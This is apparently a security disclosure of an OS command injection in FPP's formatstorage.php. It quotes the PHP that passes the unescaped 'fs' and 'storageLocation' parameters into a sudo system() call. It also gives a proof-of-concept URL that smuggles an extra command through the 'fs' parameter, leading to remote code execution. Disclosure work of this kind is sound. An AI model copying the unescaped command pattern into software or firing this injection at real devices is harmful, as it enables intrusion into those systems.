✍️ Description

Hi, it is possible to inject arbitrary OS commands in https://github.com/FalconChristmas/fpp/blob/59b7f7e8039a7019143c2c4b44f7d95b6358a4ef/www/formatstorage.php#L24

<?php
        echo "==================================================================================\n";

        $command = "sudo /opt/fpp/scripts/format_storage.sh " . $_GET['fs'] . " " . $_GET['storageLocation'] . " 2>&1";

        echo "Command: $command\n";
        echo "----------------------------------------------------------------------------------\n";
        system($command);
        echo "\n";

?>

The variables $_GET['fs'] and $_GET['storageLocation'] aren't escaped before passing them to system

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/formatstorage.php?fs=||ls

💥 Impact

RCE